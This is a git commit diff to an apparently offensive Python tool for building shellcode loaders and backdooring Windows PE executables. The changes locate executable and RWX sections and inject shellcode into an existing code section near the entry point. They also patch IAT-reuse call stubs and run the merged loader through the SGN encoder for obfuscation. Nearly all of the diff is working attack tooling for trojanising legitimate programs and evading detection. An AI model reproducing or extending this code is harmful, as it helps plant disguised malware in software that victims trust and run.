feature: rwx execution

This commit is contained in:
Dobin
2024-02-11 20:46:33 +00:00
parent 547cd94dd5
commit 6fe1f192b7
9 changed files with 166 additions and 76 deletions
+24 -13
View File
@@ -9,6 +9,7 @@ import glob
from config import config
from project import project
from pehelper import *
SHC_VERIFY_SLEEP = 0.1
@@ -24,24 +25,34 @@ def remove_trailing_null_bytes(data):
return b'' # If the entire sequence is null bytes
def get_code_section(pe_file):
def get_code_section_data(pe_file):
try:
# Load the PE file
pe = pefile.PE(pe_file)
# Iterate over the sections
for section in pe.sections:
# Check if this is the code section
if '.text' in section.Name.decode().rstrip('\x00'):
data = section.get_data()
data = remove_trailing_null_bytes(data)
print(" > 0x{:X} Code Size: {} (raw code section size: {})".format(
section.VirtualAddress,
len(data), section.SizeOfRawData))
return data
else:
print("Code section not found.")
#for section in pe.sections:
# # Check if this is the code section
# if '.text' in section.Name.decode().rstrip('\x00'):
# data = section.get_data()
# data = remove_trailing_null_bytes(data)
# print(" > 0x{:X} Code Size: {} (raw code section size: {})".format(
# section.VirtualAddress,
# len(data), section.SizeOfRawData))
# return data
section = get_code_section(pe)
if section == None:
raise Exception("Code section not found.")
print("--[ Code section: {}".format(section.Name.decode().rstrip('\x00')))
data = section.get_data()
data = remove_trailing_null_bytes(data)
print(" > 0x{:X} Code Size: {} (raw code section size: {})".format(
section.VirtualAddress,
len(data), section.SizeOfRawData))
return data
except FileNotFoundError:
print(f"File not found: {pe_file}")
except pefile.PEFormatError:
+16 -8
View File
@@ -56,6 +56,7 @@ class ExeCapabilities():
self.iat = {}
self.base_relocs = []
self.rwx_section = None
for cap in capabilities:
self.capabilities[cap] = Capability(cap)
@@ -64,6 +65,9 @@ class ExeCapabilities():
def parse_from_exe(self, filepath):
pe = pefile.PE(filepath)
if pe.FILE_HEADER.Machine != 0x8664:
raise Exception("Binary is not 64bit: {}".format(filepath))
# image base
self.image_base = pe.OPTIONAL_HEADER.ImageBase
@@ -85,14 +89,18 @@ class ExeCapabilities():
self.iat = iat
# relocs
for base_reloc in pe.DIRECTORY_ENTRY_BASERELOC:
for entry in base_reloc.entries:
entry_rva = entry.rva
reloc_type = pefile.RELOCATION_TYPE[entry.type][0]
self.base_relocs.append({
'rva': entry_rva,
'type': reloc_type,
})
if hasattr(pe, 'DIRECTORY_ENTRY_BASERELOC'):
for base_reloc in pe.DIRECTORY_ENTRY_BASERELOC:
for entry in base_reloc.entries:
entry_rva = entry.rva
reloc_type = pefile.RELOCATION_TYPE[entry.type][0]
self.base_relocs.append({
'rva': entry_rva,
'type': reloc_type,
})
# rwx
self.rwx_section = pehelper.get_rwx_section(pe)
def get(self, func_name):
+34
View File
@@ -5,6 +5,40 @@ from keystone import Ks, KS_ARCH_X86, KS_MODE_64
from capstone import Cs, CS_ARCH_X86, CS_MODE_64
def get_code_section(pe):
entrypoint = pe.OPTIONAL_HEADER.AddressOfEntryPoint
for sect in pe.sections:
name = sect.Name.decode()
#print("Checking: {} and 0x{:x}".format(name, sect.Characteristics))
if sect.Characteristics & pefile.SECTION_CHARACTERISTICS['IMAGE_SCN_MEM_EXECUTE']:
if entrypoint >= sect.VirtualAddress and entrypoint <= sect.VirtualAddress + sect.SizeOfRawData:
return sect
#else:
# print("NOOO: 0x{:x} 0x{:x} 0x{:x}".format(
# entrypoint,
# sect.VirtualAddress,
# sect.VirtualAddress + sect.SizeOfRawData,
# ))
return None
# RWX
def get_rwx_section(pe):
entrypoint = pe.OPTIONAL_HEADER.AddressOfEntryPoint
for section in pe.sections:
if (section.Characteristics & pefile.SECTION_CHARACTERISTICS['IMAGE_SCN_MEM_READ'] and
section.Characteristics & pefile.SECTION_CHARACTERISTICS['IMAGE_SCN_MEM_WRITE'] and
section.Characteristics & pefile.SECTION_CHARACTERISTICS['IMAGE_SCN_MEM_EXECUTE']
):
#name = section.Name.decode().rstrip('\x00')
if entrypoint > section.VirtualAddress and entrypoint < section.VirtualAddress + section.SizeOfRawData:
return section
return None
# keystone/capstone stuff
def assemble_and_disassemble_jump(current_address, destination_address):
+2 -1
View File
@@ -6,6 +6,7 @@ from helper import *
from config import config
from observer import observer
from project import project
from pehelper import *
def make_shc_from_asm(asm_file, exe_file, shc_file):
@@ -24,7 +25,7 @@ def make_shc_from_asm(asm_file, exe_file, shc_file):
return
print("---[ EXE to SHC: {} -> {} ]".format(exe_file, shc_file))
code = get_code_section(exe_file)
code = get_code_section_data(exe_file)
with open(shc_file, 'wb') as f:
f.write(code)
+1
View File
@@ -45,6 +45,7 @@ def create_c_from_template():
with open("build/main.c", "w", encoding='utf-8') as file:
file.write(rendered_template)
observer.add_text("main_c_rendered", rendered_template)
shutil.copy("source/peb_walk/peb_lookup.h", "build/peb_lookup.h")
else:
observer.add_text("main_c", file_readall_text("source/peb_walk/main.c"))
+19 -19
View File
@@ -29,27 +29,27 @@ def inject_exe(shc_file: FilePath):
exe_out
])
# get code section of exe_out
code = get_code_section(exe_out)
# replace IAT in shellcode in code
# and re-implant it
for cap in exe_capabilities.get_all().values():
if not cap.id in code:
print("Capability ID {} not found, abort".format(cap.id))
raise Exception()
off = code.index(cap.id)
current_address = off + exe_capabilities.image_base + exe_capabilities.text_virtaddr
destination_address = cap.addr
print(" Replace at 0x{:x} with call to 0x{:x}".format(
current_address, destination_address
))
jmp = assemble_and_disassemble_jump(
current_address, destination_address
)
code = code.replace(cap.id, jmp)
write_code_section(exe_out, code)
if project.source_style == SourceStyle.iat_reuse:
# get code section of exe_out
code = get_code_section_data(exe_out)
for cap in exe_capabilities.get_all().values():
if not cap.id in code:
print("Capability ID {} not found, abort".format(cap.id))
raise Exception()
off = code.index(cap.id)
current_address = off + exe_capabilities.image_base + exe_capabilities.text_virtaddr
destination_address = cap.addr
print(" Replace at 0x{:x} with call to 0x{:x}".format(
current_address, destination_address
))
jmp = assemble_and_disassemble_jump(
current_address, destination_address
)
code = code.replace(cap.id, jmp)
write_code_section(exe_out, code)
def verify_injected_exe(exefile):
+39 -21
View File
@@ -474,7 +474,7 @@ class PeBackdoor:
self.logger.ok('PE executable Authenticode signature removed.')
return True
def injectShellcode(self):
if self.saveMode == int(PeBackdoor.SupportedSaveModes.NewPESection):
self.pe.write(self.outfile)
@@ -494,42 +494,60 @@ class PeBackdoor:
return True
elif self.saveMode == int(PeBackdoor.SupportedSaveModes.WithinCodeSection):
entrypoint = self.pe.OPTIONAL_HEADER.AddressOfEntryPoint
section = None
for sect in self.pe.sections:
name = sect.Name.decode()
self.logger.dbg(f'Checking if section is executable: {name}')
self.logger.dbg("Checking if section is executable: {}: 0x{:x}".format(name, sect.Characteristics))
if sect.Characteristics & 0x20 != 0:
self.logger.dbg(f'Backdooring {name} section.')
# 0x20 = code
# 0x20000000 = executable
if sect.Characteristics & 0x20000000 != 0:
#if sect.Characteristics & 0x20 != 0:
# make sure its really the destination section
# UPX packed files have UPX0, UPX1, where the latter has the entry point
#self.logger.dbg("--> 0x{:x} 0x{:x} 0x{:x}".format(
# entrypoint,
# sect.VirtualAddress,
# sect.VirtualAddress + sect.SizeOfRawData,
#))
if entrypoint > sect.VirtualAddress and entrypoint < sect.VirtualAddress + sect.SizeOfRawData:
section = sect
break
if sect.Misc_VirtualSize < len(self.shellcodeData):
self.logger.fatal(f'''Input shellcode is too large to fit into target PE executable code section!
Shellcode size : {len(self.shellcodeData)}
Code section size : {sect.Misc_VirtualSize}
if section != None:
self.logger.dbg(f'Backdooring {name} section.')
if sect.Misc_VirtualSize < len(self.shellcodeData):
self.logger.fatal(f'''Input shellcode is too large to fit into target PE executable code section!
Shellcode size : {len(self.shellcodeData)}
Code section size : {sect.Misc_VirtualSize}
''')
offset = int((sect.Misc_VirtualSize - len(self.shellcodeData)) / 2)
self.logger.dbg(f'Inserting shellcode into 0x{offset:x} offset.')
offset = int((sect.Misc_VirtualSize - len(self.shellcodeData)) / 2)
self.logger.dbg(f'Inserting shellcode into 0x{offset:x} offset.')
self.pe.set_bytes_at_offset(offset, self.shellcodeData)
self.shellcodeOffset = offset
rva = self.pe.get_rva_from_offset(offset)
self.pe.set_bytes_at_offset(offset, self.shellcodeData)
self.shellcodeOffset = offset
rva = self.pe.get_rva_from_offset(offset)
p = sect.PointerToRawData + sect.SizeOfRawData - 64
graph = textwrap.indent(f'''
p = sect.PointerToRawData + sect.SizeOfRawData - 64
graph = textwrap.indent(f'''
Beginning of {name}:
{textwrap.indent(hexdump(self.pe.get_data(sect.VirtualAddress), sect.VirtualAddress, 64), "0")}
Injected shellcode in the middle of {name}:
{hexdump(self.shellcodeData, offset, 64)}
Trailing {name} bytes:
{hexdump(self.pe.get_data(self.pe.get_rva_from_offset(p)), p, 64)}
''', '\t')
self.logger.ok(f'Shellcode injected into existing code section at RVA 0x{rva:x}')
self.logger.dbg(graph)
return True
self.logger.ok(f'Shellcode injected into existing code section at RVA 0x{rva:x}')
self.logger.dbg(graph)
return True
return False
+31 -14
View File
@@ -125,13 +125,6 @@ def start():
if project.try_start_loader_shellcode:
try_start_shellcode(main_shc_file)
# SGN
#if options["obfuscate_shc_loader"]:
# obfuscate_shc_loader("main-clean.bin", "main-clean.bin")
#
# if options["verify"]:
# if not verify_shellcode("main-clean.bin"):
# return
# Merge shellcode/loader with payload
if project.dataref_style == DataRefStyle.APPEND:
@@ -150,6 +143,21 @@ def start():
# copy it to out
shutil.copyfile(main_shc_file, os.path.join("out/", os.path.basename(main_shc_file)))
# SGN
# after we packed everything (so jmp to end of code still works)
#if options["obfuscate_shc_loader"] and project.exe_capabilities.rwx_section != None:
if project.exe_capabilities.rwx_section != None:
print("--[ Use SGN]")
obfuscate_shc_loader(main_shc_file, main_shc_file + ".sgn")
observer.add_code("payload_sgn", file_readall_binary(main_shc_file + ".sgn"))
shutil.move(main_shc_file + ".sgn", main_shc_file)
#if options["verify"]:
# if not verify_shellcode("main-clean.bin"):
# return
# inject merged loader into an exe
if project.inject:
#debug_data["original_exe"] = file_readall_binary(options["inject_exe_in"])
@@ -179,13 +187,22 @@ def start():
def obfuscate_shc_loader(file_shc_in, file_shc_out):
print("--[ Convert with SGN ]")
path_sgn = r'C:\training\tools\sgn\sgn.exe'
subprocess.run([
path_sgn,
"--arch=64",
"-i", "{}".format(file_shc_in),
"-o", "{}".format(file_shc_out),
], check=True)
if True:
path_sgn = r'C:\tools\sgn2.0\sgn.exe'
subprocess.run([
path_sgn,
"-a", "64",
"{}".format(file_shc_in),
], check=True)
#shutil.copy(file_shc_in + ".sgn", file_shc_out)
else:
path_sgn = r'C:\training\tools\sgn\sgn.exe'
subprocess.run([
path_sgn,
"--arch=64",
"-i", "{}".format(file_shc_in),
"-o", "{}".format(file_shc_out),
], check=True)
if not os.path.isfile(file_shc_out):
print("Error")
return